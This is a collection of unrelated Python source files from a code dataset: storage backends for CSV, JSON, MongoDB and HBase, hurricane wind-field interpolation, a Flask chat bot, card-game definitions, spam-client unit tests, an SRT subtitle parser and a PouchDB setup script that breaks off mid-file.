-*-\n\"\"\"\n数据存储模块,按照大数据存储惯例,只增加不更新\n\"\"\"\n\nimport configparser\nimport json\nfrom lxml import etree\n\nfrom pymongo.errors import BulkWriteError\n\nconfig = configparser.ConfigParser()\nconfig.read(\"data_saver.conf\")\n\n\nclass DataSaver(object):\n \"\"\"\n 通用存储器\n \"\"\"\n\n def __init__(self):\n pass\n\n def save(self, table='test', items=None):\n \"\"\"\n 通用存储方法\n :param table: 存储表名/集合\n :param items: 待存储的数据\n \"\"\"\n pass\n\n\nclass CsvSaver(DataSaver):\n \"\"\"\n CSV文件专用存储器\n \"\"\"\n\n def __init__(self, with_head=None):\n super(CsvSaver, self).__init__()\n if not with_head:\n self.with_head = False\n else:\n self.with_head = True\n\n def save(self, table='test.csv', items=None):\n \"\"\"\n 向csv文件存储items\n :param table: 对应CSV文件的文件名\n :param items: 待插入的数据\n \"\"\"\n if items is None:\n items = []\n lines = [','.join([value for key, value in list(item.items())]) + '\\n'\n for item in items]\n if self.with_head:\n head = ','.join([key for key, value in list(items[0].items())]) + '\\n'\n lines = [head] + lines\n with open(table, 'w') as fp:\n fp.writelines(lines)\n\n\nclass JsonSaver(DataSaver):\n \"\"\"\n Json专用存储器\n \"\"\"\n\n def __init__(self, ensure_ascii=False):\n super(JsonSaver, self).__init__()\n self.ensure_ascii = ensure_ascii\n\n def save(self, table='test.json', items=None):\n \"\"\"\n 向json文件存储items\n :param table: 对应json文件的文件名\n :param items: 待插入的数据\n \"\"\"\n if items is None:\n items = []\n lines = [json.dumps(item, ensure_ascii=self.ensure_ascii) + '\\n' for item in items]\n with open(table, 'w') as fp:\n fp.writelines(lines)\n\n\nclass MongoSaver(DataSaver):\n \"\"\"\n MongoDB专用存储器\n \"\"\"\n\n def __init__(self, host=\"10.40.100.16\", database_name='test'):\n super(MongoSaver, self).__init__()\n from pymongo import MongoClient\n self.client = MongoClient(host)\n self.db = self.client.get_database(database_name)\n\n def save(self, table='test', items=None):\n \"\"\"\n 向集合存储批量数据\n :param table: 对应mongodb的collection\n :param items: 待插入的数据\n \"\"\"\n if items is None:\n items = []\n if items and items[0].get('uid'):\n items = [dict(item, **{\"_id\": item['uid']}) for item in items]\n try:\n self.db[table].insert_many(items)\n except BulkWriteError as bwe:\n print((bwe.details))\n # you can also take this component and do more analysis\n write_errors = bwe.details['writeErrors']\n print(write_errors)\n pass\n\n\nclass HBaseSaver(DataSaver):\n \"\"\"\n HBase专用数据存储器\n \"\"\"\n\n def __init__(self, host=\"10.40.100.16\", table_name='test'):\n super(HBaseSaver, self).__init__()\n import happybase\n self.connection = happybase.Connection(host)\n self.table = self.connection.table(table_name)\n\n def save(self, table='test', items=None):\n \"\"\"\n 向HBase表存储批量数据\n :param table: 对应HBase的表名\n :param items: 待插入的数据\n \"\"\"\n if items is None:\n items = []\n print((self.connection.tables()))\n\n # 判断表是否存在,如果不存在则创建\n if table not in self.connection.tables():\n print('create table')\n self.connection.create_table(table, {'info': dict(), 'stat': dict()})\n else:\n print('keep table')\n families = [key for key, _ in list(self.table.families().items())]\n print(families)\n\n key_generator = get_row_generator(table)\n key_data = {key_generator(item): HBaseSaver.family_item(families, item) for item in items}\n\n print(key_data)\n for key, data in list(key_data.items()):\n self.table.put(key, data)\n\n print((self.table.row('888')))\n\n @staticmethod\n def family_item(families, item):\n \"\"\"\n 将item的所有key转换为family:key的格式\n :param families: table的所有families\n :param item: 待传入的原始数据\n :return: key改变后的准备放入hbase的数据\n \"\"\"\n return {HBaseSaver.family_key(families, key): value for key, value in list(item.items())}\n\n @staticmethod\n def family_key(families, key):\n \"\"\"\n 将key转换为family:key的格式\n :param families: table的所有families\n :param key: 待传入的key\n :return: 改变后的key\n \"\"\"\n for family in families:\n if key.startswith(family + '_'):\n key[len(family)] = ':'\n return key\n return '%s:%s' % (families[0], key)\n\n\ndef get_uid(item):\n \"\"\"\n 获取item的uid\n :param item: item数据,dict型\n :return: item的uid\n \"\"\"\n return item.get('uid')\n\n\ndef get_row_generator(table):\n \"\"\"\n 获取table的row key生成器,一般定义在项目主包下\n :param table: table name\n :return: table的row key生成器\n \"\"\"\n generators = {\n 'test': get_uid\n }\n return generators.get(table)\n\n\nif __name__ == '__main__':\n items = [{'uid': '188', 'name': 'tung', 'nick': '嘎', 'sex': 'True'},\n {'uid': '666', 'name': 'snow', 'nick': '胖', 'sex': 'False'}]\n db_rule = '''\n \n \n \n \n \n \n '''\n\n root = etree.XML(db_rule)\n targets = [child for child in root if child.tag == 'to']\n for target in targets:\n # TODO kwargs是不是好看点\n if target.get('type') == 'mongodb':\n host = target.get('host', '10.40.100.16')\n database_name = target.get('database_name', 'test')\n collection_name = target.get('collection_name', 'test')\n data_saver = MongoSaver(host=host, database_name=database_name)\n data_saver.save(table=collection_name, items=items)\n if target.get('type') == 'hbase':\n host = target.get('host', '10.40.100.16')\n table_name = target.get('table_name', 'test')\n data_saver = HBaseSaver(host=host, table_name=table_name)\n data_saver.save(table=table_name, items=items)\n if target.get('type') == 'csv':\n with_head = target.get('with_head')\n file_name = target.get('file_name', 'test.csv')\n data_saver = CsvSaver(with_head=with_head)\n data_saver.save(table=file_name, items=items)\n if target.get('type') == 'json':\n file_name = target.get('file_name', 'test.csv')\n data_saver = JsonSaver()\n data_saver.save(table=file_name, items=items)\n\n\n\n # data_saver = JsonSaver()\n # data_saver = CsvSaver(with_head=True)\n # data_saver = HbaseSaver()\n # data_saver = MongoSaver()\n # data_saver.save(items=items)\n","sub_path":"cje/data_saver.py","file_name":"data_saver.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158150420","text":"import numpy as np\nimport sys\nimport math\nfrom scipy.interpolate import griddata\nfrom enum import Enum\n\nfrom meteo_data.hwind_data.hwind_file import HwindFile\nfrom utilities.utilities import haversine\n\n\nclass PWRelationship(Enum):\n Dvorak = 0\n Knaffzehr = 1\n SpecifiedPC = 2\n Background = 3\n\n\nclass HwindData:\n def __init__(self, meteo_file_path):\n with open(meteo_file_path) as meteo_input_file:\n #Skip first line\n meteo_input_file.readline()\n\n self.hwind_multiplier = float(meteo_input_file.readline())\n\n pw_relationship_string = meteo_input_file.readline().rstrip('\\n')\n\n if pw_relationship_string == \"dvorak\":\n self.pressure_wind_relationship = PWRelationship.Dvorak\n elif pw_relationship_string == \"knaffzehr\":\n self.pressure_wind_relationship = PWRelationship.Knaffzehr\n elif pw_relationship_string == \"specifiedPc\":\n self.pressure_wind_relationship = PWRelationship.SpecifiedPC\n elif pw_relationship_string == \"background\":\n self.pressure_wind_relationship = PWRelationship.Background\n else:\n print(\"Undefined pressure-wind relationship type: {}. Exiting!\".format(pw_relationship_string))\n sys.exit()\n\n #Assuming here that hwind files are in the same folder as meteo input file\n meteo_input_root = meteo_file_path[0:meteo_file_path.rfind('/') + 1]\n\n self.hwind_files = []\n for line in meteo_input_file:\n hwind_string = line.split()\n\n self.hwind_files.append(\n HwindFile(float(hwind_string[1]), float(hwind_string[2]), meteo_input_root + hwind_string[3]))\n\n if len(self.hwind_files) < 2:\n print(\"Insufficient number of files for temporal interpolation. Exiting!\")\n sys.exit()\n\n #Sort time ascending\n self.hwind_files.sort(key=lambda hwind_file: hwind_file.time)\n\n for hwind_file in self.hwind_files:\n hwind_file.parse_data()\n\n #Visualize parsed data to check for consistency\n #for hwind_file in self.hwind_files:\n # hwind_file.plot_data()\n\n def get_wind_data(self, input, time, grid_coord_spherical):\n interpolate = False\n\n #check if there is hwind file with same timestamp\n iter = 0\n for hwind_file in self.hwind_files:\n if hwind_file.time == time:\n break\n iter += 1\n\n if iter < len(self.hwind_files):\n #No interpolation\n curr_ramp = self.hwind_files[iter].ramp\n\n curr_storm_lon = self.hwind_files[iter].storm_center_lon\n curr_storm_lat = self.hwind_files[iter].storm_center_lat\n\n vmax = self.hwind_files[iter].vmax\n rmax = self.hwind_files[iter].rmax\n\n p_central = self.hwind_files[iter].pressure_central\n\n vx_interp = griddata(self.hwind_files[iter].spherical_grid_point_coordinates, self.hwind_files[iter].vx,\n grid_coord_spherical, fill_value=0.0)\n\n vy_interp = griddata(self.hwind_files[iter].spherical_grid_point_coordinates, self.hwind_files[iter].vy,\n grid_coord_spherical, fill_value=0.0)\n\n vx_interp = vx_interp * curr_ramp * self.hwind_multiplier\n vy_interp = vy_interp * curr_ramp * self.hwind_multiplier\n else:\n interpolate = True\n\n if interpolate:\n iter = 0\n for hwind_file in self.hwind_files:\n if hwind_file.time >= time:\n break\n iter += 1\n\n if iter != 0 and iter < len(self.hwind_files):\n #Interpolation weight\n time_range = self.hwind_files[iter].time - self.hwind_files[iter - 1].time\n intep_w = (time - self.hwind_files[iter - 1].time) / time_range\n\n #Interpolate ramp\n d_ramp = self.hwind_files[iter].ramp - self.hwind_files[iter - 1].ramp\n\n curr_ramp = self.hwind_files[iter - 1].ramp + intep_w * d_ramp\n\n #Find new storm eye\n d_lon = self.hwind_files[iter].storm_center_lon - self.hwind_files[iter - 1].storm_center_lon\n d_lat = self.hwind_files[iter].storm_center_lat - self.hwind_files[iter - 1].storm_center_lat\n\n curr_storm_lon = self.hwind_files[iter - 1].storm_center_lon + intep_w * d_lon\n curr_storm_lat = self.hwind_files[iter - 1].storm_center_lat + intep_w * d_lat\n\n #Interpolate vmax, rmax\n d_vmax = self.hwind_files[iter].vmax - self.hwind_files[iter - 1].vmax\n d_rmax = self.hwind_files[iter].rmax - self.hwind_files[iter - 1].rmax\n\n vmax = self.hwind_files[iter - 1].vmax + intep_w * d_vmax\n rmax = self.hwind_files[iter - 1].rmax + intep_w * d_rmax\n\n #Interpolate pressure central\n d_p_central = self.hwind_files[iter].pressure_central - self.hwind_files[iter - 1].pressure_central\n\n p_central = self.hwind_files[iter - 1].pressure_central + intep_w * d_p_central\n\n #Move in storm to new storm eye\n sp_grid_pt_coord_in = np.copy(self.hwind_files[iter - 1].spherical_grid_point_coordinates)\n\n d_lon_in = intep_w * d_lon\n d_lat_in = intep_w * d_lat\n\n sp_grid_pt_coord_in[:, 0] = sp_grid_pt_coord_in[:, 0] + d_lon_in\n sp_grid_pt_coord_in[:, 1] = sp_grid_pt_coord_in[:, 1] + d_lat_in\n\n #Move ex storm to new storm eye\n sp_grid_pt_coord_ex = np.copy(self.hwind_files[iter].spherical_grid_point_coordinates)\n\n d_lon_ex = curr_storm_lon - self.hwind_files[iter].storm_center_lon\n d_lat_ex = curr_storm_lat - self.hwind_files[iter].storm_center_lat\n\n sp_grid_pt_coord_ex[:, 0] = sp_grid_pt_coord_ex[:, 0] + d_lon_ex\n sp_grid_pt_coord_ex[:, 1] = sp_grid_pt_coord_ex[:, 1] + d_lat_ex\n\n #Intepolate in storm\n vx_interp_in = griddata(sp_grid_pt_coord_in, self.hwind_files[iter - 1].vx, grid_coord_spherical,\n fill_value=0.0)\n\n vy_interp_in = griddata(sp_grid_pt_coord_in, self.hwind_files[iter - 1].vy, grid_coord_spherical,\n fill_value=0.0)\n\n #Intepolate ex storm\n vx_interp_ex = griddata(sp_grid_pt_coord_ex, self.hwind_files[iter].vx, grid_coord_spherical,\n fill_value=0.0)\n\n vy_interp_ex = griddata(sp_grid_pt_coord_ex, self.hwind_files[iter].vy, grid_coord_spherical,\n fill_value=0.0)\n\n #Combine interpolations\n vx_interp = (1 - intep_w) * vx_interp_in + intep_w * vx_interp_ex\n vy_interp = (1 - intep_w) * vy_interp_in + intep_w * vy_interp_ex\n\n #Apply factors\n vx_interp = vx_interp * curr_ramp * self.hwind_multiplier\n vy_interp = vy_interp * curr_ramp * self.hwind_multiplier\n else:\n print(\"Existing hwind files are not in time range that contains t={}. Exiting!\".format(time))\n sys.exit()\n\n #Compute pressure field for Dvorak and Knaffzehr cases\n if self.pressure_wind_relationship == PWRelationship.Dvorak:\n p_central = 1015.0 - (vmax / 3.92)**(1.0 / 0.644)\n elif self.pressure_wind_relationship == PWRelationship.Knaffzehr:\n p_central = 1010.0 - (vmax / 2.3)**(1.0 / 0.76)\n\n #Use central pressure and max wind speed to estimate the Holland B value\n rho_air = input.rho_air #kg/m^3\n\n B = vmax**2 * rho_air * math.e / ((1013.0 - p_central) * 100.0) #with conversion from milibars to Pa\n B = max(min(B, 2.5), 1.0) # limit B to range [1.0,2.5]\n\n p = []\n\n for grid_point in grid_coord_spherical:\n if self.pressure_wind_relationship != PWRelationship.Background:\n distance = haversine(grid_point[0], grid_point[1], curr_storm_lon, curr_storm_lat)\n\n pressure = p_central + (1013.0 - p_central) * math.exp(-(rmax / distance)**B)\n else:\n pressure = 1013.0\n\n p.append(pressure)\n\n #Ramping pressure\n p = 1013.0 - (1013.0 - np.asarray(p)) * curr_ramp\n\n p = p * 100.0 #convert from milibars to Pa\n\n return np.column_stack((vx_interp, vy_interp, p))\n","sub_path":"meteo_data/hwind_data/hwind_data.py","file_name":"hwind_data.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358835411","text":"from flask import Flask\r\nfrom flask.templating import render_template\r\nfrom flask_socketio import SocketIO, emit\r\nfrom plebot import plebotMessage\r\n\r\n\r\napp = Flask(__name__)\r\nio = SocketIO(app)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('chat.html')\r\n\r\n@io.on('sendMessage')\r\ndef send_message_handler(msg):\r\n print(input)\r\n emit('getMessage', msg, json=True)\r\n emit('getMessage', plebotMessage(str(msg)), json=True)\r\n\r\nif __name__ == '__main__':\r\n io.run(app, debug=True)\r\n\r\n","sub_path":"webbot.py","file_name":"webbot.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431484674","text":"from ..utils import *\n\n\n##\n# Minions\n\n# Guardian of Kings\nclass CS2_088:\n\tdef action(self):\n\t\tself.heal(self.controller.hero, 6)\n\n\n# Argent Protector\nclass EX1_362:\n\tdef action(self, target):\n\t\ttarget.divineShield = True\n\n\n# Aldor Peacekeeper\nclass EX1_382:\n\taction = buffTarget(\"EX1_382e\")\n\nclass EX1_382e:\n\tatk = lambda self, i: 1\n\n\n# Tirion Fordring\nclass EX1_383:\n\taction = equipWeapon(\"EX1_383t\")\n\n\n##\n# Spells\n\n# Blessing of Might\nclass CS2_087:\n\taction = buffTarget(\"CS2_087e\")\n\n\n# Holy Light\nclass CS2_089:\n\taction = healTarget(6)\n\n\n# Blessing of Kings\nclass CS2_092:\n\taction = buffTarget(\"CS2_092e\")\n\n\n# Consecration\nclass CS2_093:\n\tdef action(self):\n\t\tfor target in self.controller.opponent.characters:\n\t\t\tself.hit(target, 2)\n\n\n# Hammer of Wrath\nclass CS2_094:\n\tdef action(self, target):\n\t\tself.hit(target, 3)\n\t\tself.controller.draw()\n\n\n# Divine Favor\nclass EX1_349:\n\tdef action(self):\n\t\tdiff = len(self.controller.opponent.hand) - len(self.controller.hand)\n\t\tself.controller.draw(max(0, diff))\n\n\n# Lay on Hands\nclass EX1_354:\n\tdef action(self, target):\n\t\tself.heal(target, 8)\n\t\tself.controller.draw(3)\n\n\n# Blessed Champion\nclass EX1_355:\n\taction = buffTarget(\"EX1_355e\")\n\nclass EX1_355e:\n\tatk = lambda self, i: i*2\n\n\n# Humility\nclass EX1_360:\n\taction = buffTarget(\"EX1_360e\")\n\nclass EX1_360e:\n\tatk = lambda self, i: 1\n\n\n# Blessing of Wisdom\nclass EX1_363:\n\taction = buffTarget(\"EX1_363e\")\n\nclass EX1_363e:\n\tdef SELF_ATTACK(self, target):\n\t\tself.controller.draw()\n\n\n# Holy Wrath\nclass EX1_365:\n\tdef action(self, target):\n\t\tdrawn = self.controller.draw()\n\t\tself.hit(target, drawn[0].cost)\n\n\n# Hand of Protection\nclass EX1_371:\n\tdef action(self, target):\n\t\ttarget.shield = True\n\n\n# Avenging Wrath\nclass EX1_384:\n\tdef action(self):\n\t\tfor i in range(8 + self.controller.spellpower):\n\t\t\tself.hit(random.choice(self.controller.opponent.characters), 1)\n\n\n# Equality\nclass EX1_619:\n\tdef action(self):\n\t\tfor target in self.game.board:\n\t\t\tself.buff(target, \"EX1_619e\")\n\nclass EX1_619e:\n\tmaxHealth = lambda self, i: 1\n\n\n##\n# Weapons\n\n# Truesilver Champion\nclass CS2_097:\n\tdef SELF_ATTACK(self, target):\n\t\tself.heal(self.controller.hero, 2)\n\n\n# Sword of Justice\nclass EX1_366:\n\tdef OWN_MINION_SUMMON(self, minion):\n\t\tself.buff(minion, \"EX1_366e\")\n\t\tself.loseDurability()\n","sub_path":"fireplace/cards/classic/paladin.py","file_name":"paladin.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"100213423","text":"#!/usr/bin/env python3\n\nimport pytest\nfrom asynctest import CoroutineMock, Mock\n\nfrom aiospamc import Client\nfrom aiospamc.client import _add_user_header, _add_compress_header\nfrom aiospamc.connections.tcp_connection import TcpConnectionManager\nfrom aiospamc.connections.unix_connection import UnixConnectionManager\nfrom aiospamc.exceptions import (BadResponse, ResponseException,\n UsageException, DataErrorException, NoInputException, NoUserException,\n NoHostException, UnavailableException, InternalSoftwareException, OSErrorException,\n OSFileException, CantCreateException, IOErrorException, TemporaryFailureException,\n ProtocolException, NoPermissionException, ConfigException, TimeoutException)\nfrom aiospamc.headers import Compress, User\nfrom aiospamc.responses import Response, Status\n\n\ndef test_client_repr():\n client = Client(host='localhost')\n assert repr(client) == ('Client(socket_path=\\'/var/run/spamassassin/spamd.sock\\', '\n 'host=\\'localhost\\', '\n 'port=783, '\n 'user=None, '\n 'compress=False, '\n 'ssl=False)')\n\n\ndef test_tcp_manager():\n client = Client(host='127.0.0.1', port='783')\n\n assert isinstance(client.connection, TcpConnectionManager)\n\n\ndef test_unix_manager():\n client = Client(socket_path='/var/run/spamassassin/spamd.sock')\n\n assert isinstance(client.connection, UnixConnectionManager)\n\n\ndef test_value_error():\n with pytest.raises(ValueError):\n client = Client(host=None, socket_path=None)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('compress,body,called,expected', [\n (None, None, False, None),\n (True, None, False, None),\n (True, 'Body', True, Compress),\n])\nasync def test_compress_decorator(compress,\n body,\n called,\n expected):\n cls = Mock()\n request = Mock()\n cls.compress = compress\n cls.body = body\n cls.func = CoroutineMock()\n cls.func = _add_compress_header(cls.func)\n\n await cls.func(cls, request)\n\n assert request.add_header.called is called\n if request.add_header.call_args:\n assert isinstance(request.add_header.call_args[0][0], expected)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('user,called,expected', [\n (None, False, None),\n ('username', True, User),\n])\nasync def test_user_decorator(user,\n called,\n expected):\n cls = Mock()\n request = Mock()\n cls.user = user\n cls.func = CoroutineMock()\n cls.func = _add_user_header(cls.func)\n\n await cls.func(cls, request)\n\n assert request.add_header.called is called\n if request.add_header.call_args:\n assert isinstance(request.add_header.call_args[0][0], expected)\n\n\n@pytest.mark.asyncio\nasync def test_send(mock_connection, request_ping, response_pong):\n mock_connection.side_effect = [response_pong, ]\n client = Client(host='localhost')\n\n response = await client.send(request_ping)\n\n assert isinstance(response, Response)\n\n\ndef test_response_exception_ok():\n response = Response(version='1.5', status_code=Status.EX_OK, message='')\n\n assert Client._raise_response_exception(response) is None\n\n\n@pytest.mark.parametrize('test_input,expected', [\n (Status.EX_USAGE, UsageException),\n (Status.EX_DATAERR, DataErrorException),\n (Status.EX_NOINPUT, NoInputException),\n (Status.EX_NOUSER, NoUserException),\n (Status.EX_NOHOST, NoHostException),\n (Status.EX_UNAVAILABLE, UnavailableException),\n (Status.EX_SOFTWARE, InternalSoftwareException),\n (Status.EX_OSERR, OSErrorException),\n (Status.EX_OSFILE, OSFileException),\n (Status.EX_CANTCREAT, CantCreateException),\n (Status.EX_IOERR, IOErrorException),\n (Status.EX_TEMPFAIL, TemporaryFailureException),\n (Status.EX_PROTOCOL, ProtocolException),\n (Status.EX_NOPERM, NoPermissionException),\n (Status.EX_CONFIG, ConfigException),\n (Status.EX_TIMEOUT, TimeoutException),\n (999, ResponseException)\n])\ndef test_response_exception(test_input, expected):\n response = Response(version='1.5', status_code=test_input, message='')\n response.status_code = test_input\n\n with pytest.raises(expected):\n Client._raise_response_exception(response)\n\n\n@pytest.mark.asyncio\nasync def test_bad_response_exception(mock_connection, request_ping):\n mock_connection.side_effect = [b'invalid']\n c = Client(host='localhost')\n\n with pytest.raises(BadResponse):\n await c.send(request_ping)\n\n\n@pytest.mark.asyncio\nasync def test_response_general_exception(mock_connection, request_ping):\n mock_connection.side_effect = [b'SPAMD/1.5 999 PONG\\r\\n']\n c = Client(host='localhost')\n\n with pytest.raises(ResponseException):\n await c.send(request_ping)\n","sub_path":"tests/client/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"285469012","text":"from pycaption import BaseReader, BaseWriter\nfrom .util import format_timestamp\n\n\nclass SRTReader(BaseReader):\n def detect(self, content):\n inlines = content.splitlines()\n if inlines[0].isdigit() and '-->' in inlines[1]:\n return True\n else:\n return False\n\n def read(self, content, lang='en-US'):\n inlines = content.splitlines()\n start_line = 0\n subdata = []\n\n while start_line < len(inlines):\n if not inlines[start_line].isdigit():\n break\n\n end_line = self._find_text_line(start_line, inlines)\n\n timing = inlines[start_line + 1].split('-->')\n start = self._srttomicro(timing[0].strip(' \\r\\n'))\n end = self._srttomicro(timing[1].strip(' \\r\\n'))\n text = []\n\n for line in inlines[start_line + 2:end_line - 1]:\n text += [{'type': 'text', 'content': line}]\n text += [{'type': 'break', 'content': ''}]\n text.pop() # remove last line break from end of caption list\n\n subdata += [[start, end, text, {}]]\n start_line = end_line\n\n return {'captions': {lang: subdata}, 'styles': {}}\n\n def _srttomicro(self, stamp):\n timesplit = stamp.split(':')\n if not ',' in timesplit[2]:\n timesplit[2] = timesplit[2] + ',000'\n secsplit = timesplit[2].split(',')\n microseconds = (int(timesplit[0]) * 3600000000 +\n int(timesplit[1]) * 60000000 +\n int(secsplit[0]) * 1000000 +\n int(secsplit[1]) * 1000)\n\n return microseconds\n\n def _find_text_line(self, start_line, inlines):\n end_line = start_line + 1\n\n while end_line < (len(inlines) + 1):\n try:\n int(inlines[end_line])\n break\n except (ValueError, IndexError):\n end_line += 1\n\n return end_line\n\n\nclass SRTWriter(BaseWriter):\n def write(self, captions):\n srts = []\n\n for lang in captions['captions']:\n srts.append(self._recreate_lang(lang, captions))\n\n return 'MULTI-LANGUAGE SRT\\n'.join(srts)\n\n def _recreate_lang(self, lang, captions):\n srt = ''\n count = 1\n\n for sub in captions['captions'][lang]:\n srt += '%s\\n' % count\n\n start = format_timestamp(sub[0], msec_separator=',')\n end = format_timestamp(sub[1], msec_separator=',')\n timestamp = '%s --> %s\\n' % (start[:12], end[:12])\n\n srt += timestamp\n for line in sub[2]:\n srt = self._recreate_line(srt, line)\n\n srt += '\\n\\n'\n count += 1\n\n return srt[:-1]\n\n def _recreate_line(self, srt, line):\n if line['type'] == 'text':\n return srt + '%s ' % line['content']\n elif line['type'] == 'break':\n return srt + '\\n'\n else:\n return srt\n","sub_path":"pycaption/srt.py","file_name":"srt.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333250760","text":"import ast\n\n\ndef datatable():\n fk = open('known_lncs_translated2xlocs_of_merged2.txt')\n fn = open('genuine_spliced_novel_assembled.txt')\n datatable = {}\n #gstable = {} \n #gsdata = []\n #line = fk.readline()\n #gs = line.split('\\t')[1].strip()\n #for line in fk:\n #if line[0] == 'G':\n #for data in gsdata:\n #try: \n #gstable[data[0]].append(data[2])\n #except:\n #gstable[data[0]] = [data[2],]\n #datatable[gs] = gstable\n #gs = line.split('\\t')[1].strip()\n #gsdata = []\n #gstable = {}\n #else:\n #row = line.strip().split('\\t')\n #gsdata.append(row)\n for line in fk:\n row = line.strip().split('\\t')\n datatable[row[0]] = ast.literal_eval(row[1])\n\n for n, line in enumerate(fn):\n n = n + 1\n data = line.strip().split('\\t')\n datatable['Lnc' + str(n)] = {'ref' + str(n): data}\n return datatable\n\n\nif __name__ == '__main__':\n fw = open('lncs3.txt', 'w')\n fw2 = open('lncs_dict3.txt', 'w')\n table = datatable()\n #print table['A330009N23Rik']\n\n\n def sort_key(gs):\n if gs[:3] == 'Lnc':\n return (1, int(gs[3:]))\n elif gs[:2] == 'Gm' and gs[2].isdigit() == True:\n if '_' in gs:\n gm_identifier = gs[2:].split('_')\n else:\n gm_identifier = (gs[2:], 0)\n return ('Gm', int(gm_identifier[0]), int(gm_identifier[1]))\n else:\n return (gs, 0)\n\n\n for gs in sorted(table.keys(), key=sort_key):\n fw.write(gs + '\\t|')\n for ref in sorted(table[gs].keys()):\n fw.write(ref + ':')\n for n, xloc in enumerate(sorted(table[gs][ref])):\n if n == 0:\n fw.write(',' + xloc + ',')\n else:\n fw.write(xloc + ',')\n fw.write('|')\n fw.write('\\n')\n fw2.write(str(table))\n\n fw.close()\n fw2.close()\n","sub_path":"make_lncdatatable.py","file_name":"make_lncdatatable.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488354263","text":"#!/usr/bin/env python\n#\n#\tCopyright 2013-2014, Marten de Vries\n#\n#\tLicensed under the Apache License, Version 2.0 (the \"License\");\n#\tyou may not use this file except in compliance with the License.\n#\tYou may obtain a copy of the License at\n#\n#\thttp://www.apache.org/licenses/LICENSE-2.0\n#\n#\tUnless required by applicable law or agreed to in writing, software\n#\tdistributed under the License is distributed on an \"AS IS\" BASIS,\n#\tWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#\tSee the License for the specific language governing permissions and\n#\tlimitations under the License.\n\nfrom setuptools import setup, Command\nimport os\nimport shlex\nimport subprocess\n\ninfo = {}\nwith open(os.path.join(\"pouchdb\", \"info.py\")) as f:\n\texec(f.read(), info)\n\nclass ScriptCommand(Command):\n\tuser_options = []\n\tworking_dir = \".\"\n\n\tdef initialize_options(self):\n\t\tpass\n\n\tdef finalize_options(self):\n\t\tpass\n\n\tdef run(self):\n\t\tos.chdir(self.working_dir)\n\t\tself.execute(subprocess.call, [shlex.split(self.script)])\n\nclass BuildPluginsJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./build-plugins\"\n\tdescription = \"Builds all JavaScript plug-ins that are developed alongside Python-PouchDB.\"\n\nclass BuildBundleJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./build-bundle\"\n\tdescription = \"Builds the JavaScript bundle of all JS code that Python-PouchDB needs.\"\n\nclass WatchBundleJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./watch-bundle\"\n\tdescription = \"Builds and keeps up-to-date the JavaScript bundle of all JS code that Python-PouchDB needs.\"\n\nclass BuildAllJSCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./build-all\"\n\tdescription = \"Builds plug-in and bundle JavaScript files.\"\n\nclass JSHintCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./run-jshint\"\n\tdescription = \"Test all JavaScript files using JSHint for style errors.\"\n\nclass NodeTestsCommand(ScriptCommand):\n\tworking_dir = \"js/\"\n\tscript = \"./run-test\"\n\tdescription = \"Runs the NodeJS tests for the plug-ins. (Only a few basic checks.)\"\n\nclass NodeDependenciesCommand(ScriptCommand):\n\tworking_dir = \"js\"\n\tscript = \"./install-node-dependencies\"\n\tdescription = \"Install all node dependencies for the modules in the js subdirectory.\"\n\nclass ExtensiveTestCommand(ScriptCommand):\n\tscript = \"python runtests.py\"\n\tdescription = \"Run the test suite generating Python coverage and with different Python/Qt versions.\"\n\nclass SimpleTestCommand(ScriptCommand):\n\tscript = \"python -m unittest pouchdb.tests\"\n\tdescription = \"Run the test suite in one version of Python with only one type of Qt binding.\"\n\nclass JSCoverageCommand(ScriptCommand):\n\tscript = \"python jscoverage.py\"\n\tdescription = \"Runs the basic test suite and gathers JS coverage info.\"\n\nsetup(\n\tname=info[\"name\"],\n\tversion=info[\"__version__\"],\n\tdescription=\"A Python interface to PouchDB\",\n\tlong_description=\"\"\"Python-PouchDB provides an interface to all the\ngoodness of the PouchDB JavaScript library (http://pouchdb.com/). It's\nreleased under the Apache License v2 and it also offers a synchronous\nAPI.\n\nUses QtWebKit internally, so either PySide, PyQt4 or PyQt5 is required.\"\"\",\n\tauthor=info[\"__author__\"],\n\tauthor_email=\"marten@openteacher.org\",\n\turl=\"http://python-pouchdb.marten-de-vries.nl/\",\n\tclassifiers=[\n\t\t\"Development Status :: 5 - Production/Stable\",\n\t\t\"Intended Audience :: Developers\",\n\t\t\"License :: OSI Approved :: Apache Software License\",\n\t\t\"Operating System :: MacOS :: MacOS X\",\n\t\t\"Operating System :: Microsoft :: Windows\",\n\t\t\"Operating System :: POSIX\",\n\t\t\"Programming Language :: JavaScript\",\n\t\t\"Programming Language :: Python :: 2\",\n\t\t\"Programming Language :: Python :: 3\",\n\t\t\"Topic :: Database\",\n\t\t\"Topic :: Software Development :: Libraries\",\n\t],\n\tpackages=[\"pouchdb\", \"pouchdb.tests\"],\n\tpackage_data={\n\t\t\"pouchdb\": [\"bundle.js\"],\n\t},\n\tinstall_requires=[\n\t\t\"jsonpickle\",\n\t\t\"python-dateutil\",\n\t],\n\ttest_suite=\"pouchdb.tests\",\n\tuse_2to3=True,\n\tcmdclass={\n\t\t\"build_plugins_js\": 